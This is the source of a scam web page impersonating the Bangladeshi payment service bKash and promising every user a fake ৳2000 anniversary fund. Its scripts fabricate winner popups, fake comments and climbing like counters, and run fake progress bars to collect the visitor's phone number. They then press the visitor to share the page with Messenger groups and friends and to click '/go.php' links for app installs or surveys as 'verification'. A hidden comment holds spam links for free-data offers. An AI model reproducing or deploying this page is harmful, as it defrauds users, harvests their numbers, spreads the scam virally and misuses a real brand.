<!DOCTYPE html>


<html>

<!--<script src="myactive.js"></script>-->

<head>
    <script>
        function set_Cookie(name, value) {
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days * 20 * 1000));
            document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString() + "; path=/;"
        }

        function get_Cookie(name) {
            var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
            if (arr = document.cookie.match(reg)) {
                return unescape(arr[2]);
            }
            return '';
        }


        /*            if(get_Cookie("d")>0 &&get_Cookie("d")<12){
                        document.getElementById("first-box")."quedate__step".display="none";//??;
                        document.getElementById("second-box").style.display="none";//??;
                        document.getElementById("third-box").style.display="none";//??;
                        document.getElementsByClassName("loading2__box").style.display="";//??;
                    }*/
    </script>

    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>bKash ৳2000 Anniversary Fund to All Users</title>
    <link rel="shortcut icon" type="image/png" href="" />
    <meta name="og:title" content="bKash ৳2000 Anniversary Fund to All Users" />
    <meta property="og:url" content="" />
    <meta property="og:description" content="bKash ৳2000 Anniversary Fund to All Users" />
    <meta property="og:image" content="https://569cdn.com/bangladesh/bkash01.jpg" />
    <meta property="og:type" content="website" />
    <meta property="og:updated_time" content="1440432930" />
</head>

<body>
    <div id="popup1" data-gjs-type="div" class="popup">
        <span id="iy8mxj" data-gjs-type="text">
      🎊 Abdul Karim <span id="iawv3z">ঢাকা থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup2" data-gjs-type="div" class="popup">
        <span id="ifhajn" data-gjs-type="text">
      🎊 Nurul Islam <span id="ioyo4w">চট্টগ্রাম থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup3" data-gjs-type="div" class="popup">
        <span id="i0qrmc" data-gjs-type="text">
      🎊 Hasina Akter <span id="is47l6">খুলনা থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup4" data-gjs-type="div" class="popup">
        <span id="i3hspy" data-gjs-type="text">
      🎊 Anis Rahman <span id="ia8fwk">বরিশাল থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup5" data-gjs-type="div" class="popup">
        <span id="iy8mxj-2" data-gjs-type="text">
      🎊 Farida Begum <span id="inzga1">রংপুর থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup6" data-gjs-type="div" class="popup">
        <span id="ifhajn-2" data-gjs-type="text">
      🎊 Mahfuz Alam <span id="i2puoy">ময়মনসিংহ থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup7" data-gjs-type="div" class="popup">
        <span id="i0qrmc-2" data-gjs-type="text">
      🎊 Shirin Akhter <span id="i0azai">রাজশাহী থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup8" data-gjs-type="div" class="popup">
        <span id="i3hspy-2" data-gjs-type="text">
      🎊 Kawsar Hossain <span id="ivbexh">সিলেট থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup9" data-gjs-type="div" class="popup">
        <span id="iy8mxj-3" data-gjs-type="text">
      🎊 Tamim Rahman <span id="iw1cao">ঢাকা থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup10" data-gjs-type="div" class="popup">
        <span id="ifhajn-3" data-gjs-type="text">
      🎊 Rokeya Sultana <span id="ikyybb">চট্টগ্রাম থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>

    <div id="popup11" data-gjs-type="div" class="popup">
        <span id="i0qrmc-3" data-gjs-type="text">
      🎊 Jahid Hasan <span id="ia33gi">খুলনা থেকে</span> পেয়েছেন ৳2000! 🎊
        </span>
    </div>
</body>

<style>
    .ac_footer a {
        color: rgb(161, 32, 0);
    }

    .ac_footer p {
        text-align: center;
    }

    img[height="1"],
    img[width="1"] {
        display: none !important;
    }

    [attr-cou] {
        display: none !important;
    }

    [attr-lan] {
        display: none !important;
    }

    * {
        max-width: unset;
    }

    #i8we {
        display: none;
        visibility: hidden;
    }

    #ivam {
        display: none;
        visibility: hidden;
    }

    .popup {
        position: fixed;
        top: -100px;
        left: 50%;
        width: 90%;
        max-width: 600px;
        background-color: #002147;
        color: #FFD700;
        padding-top: 20px;
        padding-right: 20px;
        padding-bottom: 20px;
        padding-left: 20px;
        font-weight: 700;
        box-shadow: rgba(0, 0, 0, 0.5) 0px 2px 10px;
        border-top-left-radius: 5px;
        border-top-right-radius: 5px;
        border-bottom-right-radius: 5px;
        border-bottom-left-radius: 5px;
        opacity: 0;
        visibility: hidden;
        transform: translateX(-50%);
        text-align: center;
        z-index: 99999;
        transition-behavior: normal, normal, normal;
        transition-duration: 0.5s, 0.5s, 0.5s;
        transition-timing-function: ease, ease, ease;
        transition-delay: 0s, 0s, 0s;
        transition-property: opacity, visibility, top;
    }

    .popup.show {
        top: 4px;
        opacity: 1;
        visibility: visible;
    }

    #timer-container p {
        font-size: 16px;
        margin-top: 0px;
        margin-right: 0px;
        margin-bottom: 0px;
        margin-left: 0px;
    }

    #ieaqa {
        padding-top: 10px;
        color: white;
    }

    #i4ahx {
        text-align: center;
    }

    #i5fnh {
        color: white;
    }

    #it1yg {
        color: rgb(255, 255, 255);
    }

    #liked {
        color: rgb(255, 255, 255);
        cursor: pointer;
    }

    #ixds3p {
        opacity: 1.03;
        display: block;
    }

    #i5fo6a {
        margin-top: 30px;
    }

    #ihp0f5 {
        display: inline-block;
        box-shadow: rgba(140, 212, 245, 0.8) 0px 0px 2px, rgba(0, 0, 0, 0.047) 0px 0px 0px 1px inset;
        background-color: rgb(37, 24, 155);
        animation-duration: 1.15s;
        animation-timing-function: ease;
        animation-delay: 0s;
        animation-iteration-count: infinite;
        animation-direction: normal;
        animation-fill-mode: none;
        animation-play-state: running;
        animation-name: pulse;
        animation-timeline: auto;
        animation-range-start: normal;
        animation-range-end: normal;
    }

    #i247bq {
        display: inline-block;
        box-shadow: rgba(140, 212, 245, 0.8) 0px 0px 2px, rgba(0, 0, 0, 0.047) 0px 0px 0px 1px inset;
        background-color: rgb(37, 24, 155);
        animation-duration: 1.15s;
        animation-timing-function: ease;
        animation-delay: 0s;
        animation-iteration-count: infinite;
        animation-direction: normal;
        animation-fill-mode: none;
        animation-play-state: running;
        animation-name: pulse;
        animation-timeline: auto;
        animation-range-start: normal;
        animation-range-end: normal;
    }

    #ipm3uj {
        display: inline-block;
        box-shadow: rgba(140, 212, 245, 0.8) 0px 0px 2px, rgba(0, 0, 0, 0.047) 0px 0px 0px 1px inset;
        background-color: rgb(37, 24, 155);
    }

    #i5x9nj {
        padding-top: 0px;
        padding-right: 0px;
        padding-bottom: 0px;
        padding-left: 0px;
        margin-top: 0px;
        margin-right: 0px;
        margin-bottom: 0px;
        margin-left: 0px;
        border-top-width: 0px;
        border-right-width: 0px;
        border-bottom-width: 0px;
        border-left-width: 0px;
        border-top-style: initial;
        border-right-style: initial;
        border-bottom-style: initial;
        border-left-style: initial;
        border-top-color: initial;
        border-right-color: initial;
        border-bottom-color: initial;
        border-left-color: initial;
        border-image-source: initial;
        border-image-slice: initial;
        border-image-width: initial;
        border-image-outset: initial;
        border-image-repeat: initial;
    }

    #i6w6r {
        color: rgb(136, 136, 136);
    }

    #iy5fwi {
        color: rgb(136, 136, 136);
    }

    #i8hknp {
        color: rgb(136, 136, 136);
    }

    #ig0nrl {
        color: rgb(136, 136, 136);
    }

    #idqqcn {
        color: rgb(136, 136, 136);
    }

    #i244qi {
        color: rgb(136, 136, 136);
    }

    #ifyy1g {
        color: rgb(136, 136, 136);
    }

    #ivarwe {
        color: rgb(136, 136, 136);
    }

    #i4b6nh {
        animation-duration: 1.15s;
        animation-timing-function: ease;
        animation-delay: 0s;
        animation-iteration-count: infinite;
        animation-direction: normal;
        animation-fill-mode: none;
        animation-play-state: running;
        animation-name: pulse;
        animation-timeline: auto;
        animation-range-start: normal;
        animation-range-end: normal;
    }

    #timer-container {
        margin-top: 20px;
        margin-right: 0px;
        margin-bottom: 20px;
        margin-left: 0px;
    }

    #timer {
        color: red;
        font-weight: bold;
    }

    @keyframes pulse {
        0% {
            transform: scale(1);
        }
        50% {
            transform: scale(1.25);
        }
        100% {
            transform: scale(1);
        }
    }
</style>
<script src="https://cdn.jsdelivr.net/npm/canvas-confetti@1.3.2/dist/confetti.browser.min.js" id="iu4u6k"></script>
<script id="inp7bq">
    // document.addEventListener('DOMContentLoaded', function () {
    //         hidemodal01();
    //     }
    // );
    let redirectTimer;

    function startRedirectTimer() {
        // Устанавливаем таймер на 45 секунд
        redirectTimer = setTimeout(function() {
            window.location.href = REDIRECT_URL;
        }, 300000);
    }

    function resetRedirectTimer() {
        // Сбрасываем текущий таймер
        clearTimeout(redirectTimer);
        // Запускаем таймер заново
        startRedirectTimer();
    }

    // Запуск таймера при загрузке страницы
    startRedirectTimer();
    // Отслеживаем взаимодействия пользователя
    document.addEventListener("mousemove", resetRedirectTimer);
    document.addEventListener("keydown", resetRedirectTimer);
    document.addEventListener("click", resetRedirectTimer);
    document.addEventListener("scroll", resetRedirectTimer);

    // Таймер обратного отсчета
    function startTimer(duration, display) {
        let timer = duration,
            minutes, seconds;
        setInterval(function() {
            minutes = parseInt(timer / 60, 10);
            seconds = parseInt(timer % 60, 10);
            minutes = minutes < 10 ? "0" + minutes : minutes;
            seconds = seconds < 10 ? "0" + seconds : seconds;
            display.textContent = minutes + ":" + seconds;
            if (--timer < 0) {
                timer = duration;
            }
        }, 1000);
    }

    const duration = 59;
    const display = document.querySelector('#timer');
    startTimer(duration, display);
    // Появление попапа
    document.addEventListener("DOMContentLoaded", function() {
        const popups = [{
                id: 'popup5',
                delay: 3000,
                duration: 4000
            },
            {
                id: 'popup6',
                delay: 9000,
                duration: 4000
            },
            {
                id: 'popup7',
                delay: 17000,
                duration: 4000
            },
            {
                id: 'popup8',
                delay: 25000,
                duration: 4000
            },
            {
                id: 'popup9',
                delay: 33000,
                duration: 4000
            },
            {
                id: 'popup10',
                delay: 41000,
                duration: 4000
            },
            {
                id: 'popup11',
                delay: 49000,
                duration: 4000
            }
        ];

        // Функция для показа конфетти
        function showConfetti() {
            confetti({
                particleCount: 150,
                spread: 120,
                startVelocity: 30,
                gravity: 0.5,
                origin: {
                    x: 0.5,
                    y: 0
                },
                scalar: 1.4,
                drift: 0,
                shapes: ['circle', 'square'],
                colors: ['#bb0000', '#ffffff'],
                useWorker: true,
                zIndex: 99999,
                disableForReducedMotion: true
            });
        }

        popups.forEach(popup => {
            const element = document.getElementById(popup.id);
            setTimeout(function() {
                element.classList.add("show");
                showConfetti();
                // Показываем конфетти при каждом попапе
                setTimeout(function() {
                    element.classList.remove("show");
                }, popup.duration);
                // Убедитесь, что скрытие происходит через `duration` после показа
            }, popup.delay);
            // Показываем попап с задержкой `delay`
        });
        // Обработчик кликов для кнопок в модальном окне
        document.addEventListener('click', (event) => {
            const activeModal = document.querySelector('.sweet-alert.animated.bounceIn.visible');
            if (activeModal) {
                const activeButton = activeModal.querySelector('button');
                const customClickEvent = new Event('customClick');
                activeButton.dispatchEvent(customClickEvent);
            }
        });
        // Привязка пользовательских событий к кнопкам
        document.getElementById('ihp0f5').addEventListener('customClick', function() {
            this.click();
        });
        document.getElementById('i247bq').addEventListener('customClick', function() {
            this.click();
        });
        document.getElementById('ipm3uj').addEventListener('customClick', function() {
            this.click();
        });
    });

    // Закрываем попап и крутим спин
    function hidemodal01() {
        $('#modal01').removeClass('visible');
        $('.sweet-overlay').css('display', 'none');
        $('#spin').addClass('spinAround');
        $('#xmas').css('display', 'none');
        setTimeout(function() {
            $('#modal02').addClass('visible');
            $('.sweet-overlay').css('display', 'block');
            $('#xmas').css('display', 'block');
            $('#xmas').css('top', 'calc(50% - 210px)');
            setTimeout(function() {
                $('#success02').addClass('animate');
                $('#successtip02').addClass('animateSuccessTip');
                $('#successlong02').addClass('animateSuccessLong');
            }, 500);
        }, 7500);
    }

    function hidemodal02() {
        $('#modal02').removeClass('visible');
        $('.sweet-overlay').css('display', 'none');
        $('#spin').addClass('spinAround2');
        $('#xmas').css('display', 'none');
        setTimeout(function() {
            $('#iphone').css('display', 'block');
        }, 7000);
        setTimeout(function() {
            $('#modal03').addClass('visible');
            $('.sweet-overlay').css('display', 'block');
            $('#xmas').css('display', 'block');
            $('#xmas').css('top', 'calc(50% - 210px)');
            setTimeout(function() {
                $('#success03').addClass('animate');
                $('#successtip03').addClass('animateSuccessTip');
                $('#successlong03').addClass('animateSuccessLong');
            }, 500);
        }, 8000);
    }
</script>
<style type="text/css">
    @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");
    @import url("//fonts.googleapis.com/earlyaccess/droidarabicnaskh.css");
    * {
        margin: 0;
        padding: 0;
        font-family: Poppins, Droid Arabic Naskh;
        font-weight: normal;
        box-sizing: border-box;
    }

    body {
        direction: lfr;
        background: #ebedf0;
    }

    a {
        text-decoration: none;
    }

    .post {
        background: #fff;
        margin: 0 auto;
        padding: 10px;
        max-width: 500px;
        border: 1px solid #d0d1d5;
        border-radius: 3px;
    }

    .post img {
        width: 100%;
    }

    .welcome {
        font-size: 15px;
    }

    .amount,
    #getname {
        color: #43B05F;
        text-decoration: none;
    }

    .done {
        text-align: center;
        color: #27ae60;
    }

    .tip {
        font-size: 14px;
    }

    .title {
        text-align: center;
    }

    .error {
        display: none;
        text-align: center;
        font-size: 14px;
        color: #e74c3c;
    }

    button {
        display: block;
        width: 200px;
        height: 50px;
        color: #fff;
        border: none;
        outline: none;
        font-size: 24px;
        cursor: pointer;
        border-radius: 5px;
        padding: 0 10px;
        margin: 10px auto;
        background: #43B05F;
        transition: background 0.3s ease;
    }

    button:hover {
        background: #02652c;
    }

    .phone {
        max-width: 400px;
        margin: 10px auto;
    }

    .phone input {
        width: 100%;
        height: 50px;
        padding: 10px;
        outline: none;
        border: 2px solid #cecece;
        font-size: 14px;
    }

    #confirm {
        width: 200px;
        margin: 10px auto;
        border-radius: 0px;
    }

    #loader {
        text-align: center;
    }

    .spin {
        width: 50px;
        height: 50px;
        background: transparent;
        border: solid 8px #43B05F;
        border-right-color: transparent;
        border-radius: 50%;
        margin: 10px auto;
        animation: spin 0.8s linear infinite;
    }

    @keyframes spin {
        100% {
            transform: rotate(1turn);
        }
    }

    #loader,
    #info,
    #checking,
    #share,
    #claim {
        display: none;
    }

    .center {
        display: flex;
        align-items: center;
        justify-content: center;
    }

    .barr {
        direction: ltr;
        max-width: 400px;
        margin: 10px auto;
        box-sizing: border-box;
    }

    .fill {
        position: relative;
        display: inline-block;
        width: calc(100% - 100px);
        height: 35px;
        padding: 2px;
        border: 2px solid #43B05F;
    }

    #fill,
    #fill2 {
        background: #43B05F;
        width: 0%;
        height: 100%;
    }

    .percentage {
        width: 100px;
        float: right;
        height: 35px;
        font-size: 16px;
        border: 2px solid #43B05F;
    }

    #percentage,
    #percentage2 {
        margin-left: 5px;
    }

    #check,
    #check2 {
        display: none;
    }

    .counter {
        color: #7f7f7f;
        font-size: 12px;
        text-align: right;
        padding: 10px 0 10px 2px;
        border-bottom: 1px solid #43B05F;
    }

    .reactions {
        display: inline-flex;
        align-items: center;
        float: left;
    }

    .counter img {
        float: left;
        width: 16px;
        height: 16px;
        border-radius: 50%;
        border: 2px solid #fff;
        box-sizing: content-box;
    }

    .like,
    .love {
        margin-right: -5px;
    }

    .like {
        z-index: 2;
    }

    .love {
        z-index: 1;
    }

    .bar {
        display: table;
        width: 100%;
        border-bottom: 1px solid #43B05F;
    }

    .bar .react {
        display: table-cell;
        width: calc(100% / 3);
        font-size: 12px;
        color: #7f7f7f;
        text-align: center;
        padding: 10px 0;
        cursor: pointer;
    }

    .comments {
        direction: ltr;
    }

    .comment {
        padding: 6px 0;
        margin-top: 5px;
    }

    .comment img {
        float: left;
        width: 32px;
        height: 32px;
        border: none;
        border-radius: 18px;
        cursor: pointer;
    }

    .reply {
        margin-left: 37px;
    }

    .single-container {
        margin-left: 37px;
        background: #f1f2f6;
        padding: 10px;
        border-radius: 15px;
        font-size: 12px;
    }

    .single-container .user {
        display: inline-block;
        cursor: pointer;
        color: #365899;
        margin-bottom: 5px;
    }

    .single-container .text {
        display: block;
    }

    .buttons {
        font-size: 12px;
        font-weight: bold;
        margin: 10px 0 0 47px;
        color: #90949c;
    }

    .action {
        cursor: pointer;
    }

    .action:hover {
        text-decoration: underline;
    }

    .input {
        padding: 6px 12px 12px;
    }

    .input input {
        width: 100%;
        background: #f1f2f6;
        padding: 10px;
        border-radius: 15px;
        border: 0;
        outline: none;
    }

    .A {
        text-align: center;
        background-color: #002147;
        color: #FFD700;
    }

    /* Style the header */

    .header {
        text-align: center;
        background-color: #02652c;
        color: #fff;
        padding: 20px 0;
        color: #fff;
        font-weight: bold;
        background-image: linear-gradient(555deg, #ff0080, #43B05F, #ff00ff, #111, #008080);
    }

    .marquee {
        background-image: linear-gradient(555deg, #ff0080, #43B05F, #ff00ff, #111, #008080);
        border: 3px solid #ff0080;
        width: 100%;
        padding: 3px;
        border-radius: 40px;
        color: #fff;
        font-weight: bold;
        font-size: 18px;
        overflow: hidden;
        white-space: nowrap;
        padding-left: 10px;
    }

    .marquee span {
        display: inline-block;
        padding-left: 100%;
        animation: marquee-animation 50s linear infinite;
    }

    @keyframes marquee-animation {
        0% {
            transform: translateX(0);
        }
        50% {
            transform: translateX(-100%);
        }
        100% {
            transform: translateX(0);
        }
    }
</style>
<style>
    .telbtn {
        background-color: #43B05F;
        box-shadow: 0 4px 5px rgba(0, 0, 0, 0.3);
        display: flex;
        justify-content: center;
        text-decoration: none;
        height: 60px;
        border-radius: 50px;
    }

    span.telp {
        color: white;
        font-size: 18px;
        padding: 20px;
        font-weight: 400;
        margin: 0;
    }

    .telbtn:hover {
        opacity: 80%;
    }
</style>


<center><img src="https://569cdn.com/bangladesh/bkash01.jpg" alt="fund" style="width: 100%;"></center>

<marquee class="horizontal_marque" direction="left">
    সব bKash ব্যবহারকারীদের অভিনন্দন! আমরা আমাদের প্রিয় গ্রাহকদের জন্য ৳২০০০ ক্যাশ ফান্ড উদযাপন করছি।
</marquee>

<div class="A">
    <b></br>bKash তার সকল ব্যবহারকারীদের ৳২০০০ বার্ষিকী ফান্ড দিচ্ছে।
</div>

<div class="post" width="100%">

    <div id="intro">

        <p class="welcome">
        <br><center>দয়া করে নিচে "GET ৳২০০০" বোতামে ক্লিক করুন এবং আপনার মোবাইল নম্বর লিখুন যাতে আপনি ৳২০০০ বার্ষিক উপহার পেতে পারেন।</center></p>

        <button id="go">GET ৳২০০০</button>
        </div>
         <div id="loader">
            <div>অনুগ্রহ করে অপেক্ষা করুন ...</div>
            <div class="spin"></div>
            <div id="num">0%</div>
        </div>

        <div id="info">
            <p class="title">আপনার মোবাইল নম্বর লিখুন:</p>
            <div class="phone">
                <center>
                    <input type="char" placeholder="এখানে লিখুন" id="name" name="Phone" 
                        style="fontwidth: 244px;height: 56px;font-size: 18px;width: 330px;" 
                        onkeypress="return numberonly(event);">
                </center>
                <center>
                    <br>
                     <center>
                
<button id="confirm">পরবর্তী</button>
</div>
<p class="error">দয়া করে আপনার সঠিক নম্বর লিখুন!</p>
</div>
<div id="checking">
<p class="title">লোড হচ্ছে...</p>
    <div class="barr">
        <div class="fill">
            <div id="fill"></div>
        </div>
        <div class="percentage center">
            <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
            <span id="check"><i class="fa fa-check-circle"></i></span>
            <span id="percentage"></span>
        </div>
    </div>
</div>
<div id="share">
<center>
  <h3>
    <p class="tip">
      আপনার মোবাইল নম্বর হল: <span id="getname"></span>.
    </p>
  </h3>
  <br>
  <p class="tip">
    অভিনন্দন, আপনি bKash থেকে ৳2000 জন্মদিন ক্যাশ উপহারের জন্য যোগ্য।<br>
    <span class="amount"><br><center>কিভাবে আপনার ৳2000 পাবেন?</center></span>
  </p>
  <p class="tip">
    ১. এটিকে Messenger-এ ৫টি গ্রুপ অথবা ১৫ জন বন্ধুর সাথে শেয়ার করুন (নীচের "SHARE" আইকনে ক্লিক করুন)।
  </p>
  <p class="tip">
    ২. সবুজ ভেরিফিকেশন বার পূর্ণ হলে আপনি স্বয়ংক্রিয়ভাবে আমাদের "<b>PAYMENT FORM</b>" পেজে রিডিরেক্ট হবেন।
    </p>
    <p class="tip">
        ৩. সফল আবেদন করার পর আপনি আপনার bKash ড্যাশবোর্ডে ৳2000 পেয়ে যাবেন।
    </p>

    <button id="Messenger">এখন শেয়ার করুন</button>
    <div class="barr">
        <div class="fill">
            <div id="fill2"></div>
        </div>
        <div class="percentage center">
            <span><i class="fa fa-spinner fa-pulse"></i></span>
            <span id="percentage2">0%</span>
        </div>
    </div>
</div>
<div id="claim">
    <p class="done">
        <i class="fa fa-check-circle fa-3x" aria-hidden="true"></i>
    </p>
    <p class="title">
        আপনার ৳2000 জন্মদিন ফান্ড অনুমোদিত হয়েছে!<br> আপনার bKash অ্যাকাউন্টে টাকা পেতে নিচের যেকোনো একটি অপশন বেছে নিয়ে যাচাইকরণ সম্পূর্ণ করুন।
    </p>
    <br />

    <div class="loading2__box" style="background-color:#f9f9f9; border:1px solid #ddd; padding:10px; border-radius:8px; font-size:14px; margin-bottom:15px">
        <b style="font-weight:bold;">🎉 অভিনন্দন!</b> আপনি যাচাইকরণের শেষ ধাপে পৌঁছেছেন।<br><br> আপনি 100GB ফ্রি ডেটা, iPhone, iPad সহ আরও পুরস্কার জিততে পারেন!<br><br> আমরা আপনাকে অনুরোধ করছি নিচের যেকোনো একটি পদ্ধতি অনুসরণ করতে — যেমন অ্যাপ ডাউনলোড,
        ফোন নম্বর যোগ, ইনস্টলেশন বা ছোট সমীক্ষা।<br><br> ⚠️ দয়া করে মনে রাখবেন — এই ধাপটি অত্যন্ত গুরুত্বপূর্ণ। যাচাই সম্পূর্ণ না হলে আপনার অর্থ প্রদান সম্পন্ন হবে না।<br><br> ✅ এখন নিচের যেকোনো একটি বাটনে ক্লিক করে যাচাই সম্পন্ন করুন।
    </div>

    <a class='telbtn' href='/go.php?t=1' target='_blank'>
    <span class='telp'>✅ এখন পেমেন্ট যাচাই করুন!</span>
  </a>
    <br />
    <a class='telbtn' href='/go.php?t=2' target='_blank'>
    <span class='telp'>🎁 এখানে ৳২০০০ ক্লেইম করুন</span>
  </a>
    <br />
    <a class='telbtn' href='/go.php?t=3' target='_blank'>
    <span class='telp'>📲 মোবাইল যাচাই করে চালু করুন</span>
  </a>
</div>

<br><br>
<center><img src="https://569cdn.com/bangladesh/bkash02.jpg" alt="ODO" style="width: 100%;"></center>
<div class="comments">
    <div class="counter">
        <div class="reactions">
            <img class="like" src="https://569cdn.com/bangladesh/tx01.jpg" />
            <img class="love" src="https://569cdn.com/bangladesh/tx02.jpg" />
            <img class="care" src="https://569cdn.com/bangladesh/tx03.jpg" />
            <span id="likes">১৩৪K</span>
        </div>
        <span id="comments">২৩K মন্তব্য</span> <span class="dot">·</span> <span id="shares">১২K বার শেয়ার হয়েছে</span>
    </div>
    <div class="bar">
        <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">লাইক করুন</a></span>
        <span class="react"><i class="fa fa-comment-o"></i> মন্তব্য করুন</span>
        <span class="react"><i class="fa fa-share"></i> শেয়ার করুন</span>
    </div>
    <div>
        <div class="comment"></div>
    </div>
    <div class="comment">
        <img src="https://569cdn.com/bangladesh/tx04.jpg" />
        <div class="single-container">
            <span class="user">Abdullah Y</span>
            <span class="text">প্রথমে ভাবছিলাম এটা ফেক হবে, কিন্তু এটা সত্যিই মিলে গেছে। ধন্যবাদ bKash!</span>
        </div>
        <div class="buttons">
            <span class="time t1">১মিনিট</span> <span class="dot">·</span> <span class="action liked">লাইক</span> · <span class="action">জবাব দিন</span>
        </div>
    </div>
    <div class="comment">
        <img src="https://569cdn.com/bangladesh/tx05.jpg" />
        <div class="single-container">
            <span class="user">R Paul</span>
            <span class="text">আমি পেয়েছি, আমার বন্ধুরাও এটা জানলে ভালো হয়!!!</span>
        </div>
        <div class="buttons">
            <span class="time t2">২মিনিট</span> <span class="dot">·</span> <span class="action liked">লাইক</span> · <span class="action">জবাব দিন</span>
        </div>
    </div>
    <div class="comment reply">
        <img src="https://569cdn.com/bangladesh/tx06.jpg" />
        <div class="single-container">
            <span class="user">Habib M</span>
            <span class="text">ওয়াও! আমি তো এখনই টাকা পেয়েছি.. অনেক ধন্যবাদ..</span>
        </div>
        <div class="buttons">
            <span class="time t1">১মিনিট</span> <span class="dot">·</span> <span class="action liked">লাইক</span> · <span class="action">জবাব দিন</span>
        </div>
    </div>
    <div class="comment">
        <img src="https://569cdn.com/bangladesh/tx07.jpg" />
        <div class="single-container">
            <span class="user">Akdar A</span>
            <span class="text">খুব ভালো! ধন্যবাদ ❤️</span>
        </div>
        <div class="buttons">
            <span class="time t3">৫মিনিট</span> <span class="dot">·</span> <span class="action liked">লাইক</span> · <span class="action">জবাব দিন</span>
        </div>
    </div>

    <div class="input"><input placeholder="একটি মন্তব্য লিখুন..." /></div>
</div>
</div>
</div>

<script src="https://code.jquery.com/jquery-latest.min.js"></script>


<script type="text/javascript">
    var time = 0;
    window.setInterval(function() {
        time = time + 1;
        $(".t1").html(time + 1 + "m");
        $(".t2").html(time + 2 + "m");
        $(".t3").html(time + 4 + "m");
    }, 6e4);
    var likes = 134,
        comments = 23,
        shares = 12;
    window.setInterval(function() {
        likes = likes + Math.floor(Math.random() * 3);
        comments = comments + Math.floor(Math.random() * 2);
        shares = shares + Math.floor(Math.random() * 2);
        $("#likes").html(likes + "K");
        $("#comments").html(comments + "K comments");
        $("#shares").html(shares + "K shares");
    }, 5e3);
    $(".liked").click(function() {
        if ($(this).hasClass("selected")) {
            $(this).removeClass("selected");
            $(this).html("Like");
        } else {
            $(this).addClass("selected");
            $(this).html("Unlike");
        }
    });
</script>
<script type="text/javascript">
    $("#go").click(function() {
        $("#intro").fadeOut(0);
        $("#loader").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function() {
            $("#num").text(i + "%");
            i += 1;
            if (i >= 100) {
                clearInterval(interval);
                $("#loader").fadeOut(0);
                $("#info").fadeIn(1000);
            }
        }, 50);
    });
    $("#confirm").click(function() {
        if ($("#name").val().length < 4) {
            $(".error").fadeIn(500);
        } else {
            $("#info").fadeOut(0);
            $("#checking").fadeIn(1000);
            var i = 0;
            var interval = setInterval(function() {
                i += 1;
                $("#percentage").text(i + "%");
                $("#fill").css("width", i + "%");
                if (i == 50) {
                    i = 49;
                    setTimeout(function() {
                        i = 50;
                    }, 1000);
                }
                if (i >= 100) {
                    clearInterval(interval);
                    $("#load").fadeOut(0);
                    $("#check").fadeIn(0);
                    setTimeout(function() {
                        $("#checking").fadeOut(0);
                        $("#share").fadeIn(1000);
                        $("#getname").html($("#name").val());
                    }, 500);
                }
            }, 50);
        }
    });
    $(document).click(function() {
        if ($("#name").is(":focus")) {
            $(".error").fadeOut(500);
        }
    });
</script>

<!--
"*30%20GB%20Free%20Internet%20Offer*%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
-->
<script src="/single.php"></script>
<script>
    var text1 = "*bKash ৳২০০০ জন্মদিন ফান্ড সকল ব্যবহারকারীর জন্য উপলব্ধ!*%0A%0A*_আপনার ৳২০০০ কিভাবে পাবেন?_*%0Aনিচের লিঙ্কে গিয়ে আপনার মোবাইল নম্বর সঠিকভাবে দিন এবং আপনার জন্মদিন ফান্ড সংগ্রহ করুন।%0A%0A_এখানে ক্লিক করুন_👇%0A";

    text2 = "৳২০০০ মূল্যের বিশেষ উপহার ঘোষণা করা হয়েছে, ";
    text3 = "bKash-এর বিশেষ উপহার ক্যাম্পেইনের অংশ হিসেবে যোগ্য নাগরিকদের জন্য। সঠিকভাবে নিবন্ধন সম্পন্ন করতে নিচের লিঙ্কে যান 👉 ";
    error = "দুঃখিত, কিছু ভুল হয়েছে!\nআপনি হয়তো একই বন্ধু বা গ্রুপে একাধিকবার শেয়ার করেছেন, অনুগ্রহ করে আবার শেয়ার করুন।";
    abcde = "/go.php",
        saved = "",
        share = "fb-messenger://share/?link=" + encodeURIComponent(landingDomain);
</script>







<script>
    <!-- code by OD -->
